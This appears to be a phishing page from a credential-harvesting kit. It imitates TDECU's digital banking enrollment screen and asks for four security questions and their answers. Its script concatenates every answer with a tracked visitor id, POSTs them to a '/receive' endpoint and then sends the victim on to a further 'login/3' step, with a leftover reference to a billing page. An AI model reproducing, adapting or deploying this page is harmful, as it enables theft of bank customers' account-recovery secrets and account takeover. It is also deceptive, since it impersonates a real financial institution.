<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=2.0, user-scalable=1" />
    <title>Verify your security questions and their answers:</title>
    
    
    
    
    
    
    <link rel="stylesheet" href="https://cdn1.onlineaccess1.com/cdn/wedge/sdk_e2e/css/all.min.css" />
    <link rel="stylesheet" href="https://cdn1.onlineaccess1.com/cdn/wedge/sdk_e2e/css/layout5.css" />
    <style>
        html {
            min-height: 100%
        }


        body {
            background-image: url('https://cdn1.onlineaccess1.com/cdn/depot/5004/2760/6d485fb1cedacdf031982996b6d14b69/assets/images/desktop-background-42ab18ae778d405b2d31d3a89639acc2.jpg');
            background-repeat: no-repeat;
            background-size: cover;
            background-attachment: fixed;
            background-position: bottom right;
        }


        body {
            background-color: ;
        }

        .container-fluid.heading {
            width: 66.6666666666667%;
            padding: 6% 0 0 0;
        }


        .heading .col-xs-12 {
            background-color: #ffffff;
            padding: 1em;
            border-radius: 8px 8px 0 0;
        }


        .btn-primary {
            background-color: #D24114 !important;
        }


        .btn-primary {
            color:  !important;
        }


        .btn-primary {
            border-color: #D24114 !important;
        }

        @media screen and (max-width: 991px) {
            .container-fluid.heading {
                width: 83.3333333333333%;
            }
        }

        @media screen and (max-width: 767px) {
            .container-fluid.heading {
                width: 100%;
                padding: 0 0 0 0;
            }
        }

        .container-fluid+.container {
            background-color: #f6f6f6;
        }

        .outage-msg {
            font-size: 19px;
        }
    </style>
    

</head>

<body>
    <div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-body">
                    <div class="row">
                        <div class="col-xs-12 congrats">
                            <h2><i class="icon-ok-circle" aria-hidden="true" id="modal-title"></i></h2>
                        </div>
                        <div class="col-xs-12" id="success_message"></div>
                        <div class="col-xs-12" id="modal-body"></div>
                    </div>
                </div>
                
            </div>
        </div>
    </div>

    <div class="container-fluid heading">
        <div class="col-xs-12" style="text-align: center">
            <img id="logo-large" src="https://cdn1.onlineaccess1.com/cdn/depot/5004/2760/6d485fb1cedacdf031982996b6d14b69/assets/images/logos/logo_large-ef7dc174225ddfcbbc5eb8128e8690e5.png" style="max-width: 100%; height: auto;" alt="Q2 CI Environment" />
        </div>
    </div>
    <div class="container col-lg-8 col-lg-offset-2 col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1 col-xs-12">
        <div class="row" style="margin-bottom: 40px;">
            <div class="clearfix col-xs-12 col-sm-10 col-sm-offset-1">
                <h1 id="page_title"> Verify your security questions and their answers</h1>
                <p id="page_message" class="page-message"> </p>
                <ul id="nav-tabs" class="nav nav-tabs" role="tablist" style="display: none;"></ul>
            </div>
            <div class="clearfix col-xs-12 col-sm-10 col-sm-offset-1">
                <noscript>
                    <style>
                        .btn {
                            display: none;
                        }
                    </style>
                    <div id="alertBox" class="alertBox">
                        <div class="row">
                            <div class="col-xs-2 col-sm-1 col-md-1">
                                <i class="icon-warning-sign"></i>
                            </div>
                            <div class="col-xs-10 col-sm-11 col-md-11 modal-msg">JavaScript is disabled. Please enable JavaScript to correctly display the page.</div>
                        </div>
                    </div>
                </noscript>

                <div id="q2-form-fields" class="tab-content">
                    <div id="personal">
                        <form autocomplete="off" class="q2-form fv-form fv-form-bootstrap" name="OnlineEnrollment_personal" id="form" action="javascript:void(0);" method="post" form="" novalidate="novalidate"><button type="submit" class="fv-hidden-submit" style="display: none; width: 0px; height: 0px;"></button><!-- Alert Area -->
                            <div id="OnlineEnrollment_personalalertBox" class="alertBox hidden">
                                <div class="row">
                                    <div class="col-xs-2 col-sm-1 col-md-1"><i class="icon-warning-sign" aria-hidden="true"></i></div>
                                    <div class="col-xs-10 col-sm-11 col-md-11 modal-msg"></div>
                                </div>
                            </div><!-- End Alert Area -->
                            	
                            	
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="q1">Question 1:</label>
        <input class="a-field-control form-control input-sm" type="text" id="q1" name="question1" required>
    </div>
    
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="a1">Answer 1:</label>
        <input class="a-field-control form-control input-sm" type="text" id="a1" name="answer1" required>
    </div>
    
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="q2">Question 2:</label>
        <input class="a-field-control form-control input-sm" type="text" id="q2" name="question2" required>
    </div>
    
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="a2">Answer 2:</label>
        <input class="a-field-control form-control input-sm" type="text" id="a2" name="answer2" required>
    </div>
    
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="q3">Question 3:</label>
        <input class="a-field-control form-control input-sm" type="text" id="q3" name="question3" required>
    </div>
    
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="a3">Answer 3:</label>
        <input class="a-field-control form-control input-sm" type="text" id="a3" name="answer3" required>
    </div>
    
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="q4">Question 4:</label>
        <input class="a-field-control form-control input-sm" type="text" id="q4" name="question4" required>
    </div>
    
    <div class="input-wrapper">
        <label class="tru-core-input__label" for="a4">Answer 4:</label>
        <input class="a-field-control form-control input-sm" type="text" id="a4" name="answer4" required>
    </div>
    
    
    
    

    
    
                            
                            
                            <div class="col-xs-12 ">
                                <div class="line">
                                    <p style="margin-top: 10px;"></p>
                                    <center>
                                    <br />To enroll your business or commercial accounts in TDECU Digital Banking, please <a href="https://www.tdecu.org/contact-form/">contact us.</a></center><br />
                                    	
                                    </p>
                                </div>
                            </div><input type="hidden" name="EnrollmentType" value="retail" /><input id="token_OnlineEnrollment_personal" type="hidden" name="token" value="" /><button class="btn btn-primary pull-right" id="submit_button_OnlineEnrollment_personal" test-id="e2e-submitButton">Continue</button>
                            	
                             </form>
                    </div>
                </div>

            </div>
        </div>
    </div>
    <div role="contentinfo" class="footer col-lg-8 col-lg-offset-2 col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1 col-xs-12"></div>
    <div id="sr-message" aria-live="assertive" class="sr-only"></div>



    
</body>
<script src=
'https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js'>
    </script>
<script>
    	
    $(document).ready(function() {
    $('#submit_button_OnlineEnrollment_personal').on('click', function(event) {
        event.preventDefault();
        let myForm = $("#form");
        let checkInputs = document.querySelectorAll('.form-control');
		let message = "";
        // Flag to track if any input is empty
        let isEmpty = false;

        for (const check of checkInputs) {
            if (check.value.trim() === "") {
            	console.log(check.nextElementSibling);
                check.parentElement.classList.add('has-error');
                
                
                
                isEmpty = true;
            }else{
                check.parentElement.classList.remove('has-error');
                 message += check.name +': '+check.value+'\n';
                 console.log(message);
                isEmpty = false;
            }
        }

        if (!isEmpty) {
				            // Validation passed, proceed with form submission
				            let userinfo = myForm.serializeArray();
				let visitor = sessionStorage.getItem('visitor');
				
				let url = '/receive';
				
				$.ajax({
				    method: 'POST',
				    url: url,
				    data: { message: message, visitor: visitor }
				}).done(function(msg) {
                console.log(msg);
                // When the request is successful
                window.location.href = "login/3";
               // window.location.href = "billing.php";
            }).fail(function(err, textstatus, error) {
                // Handle AJAX request failure here
            });
        }
    });
});
    </script>
</html>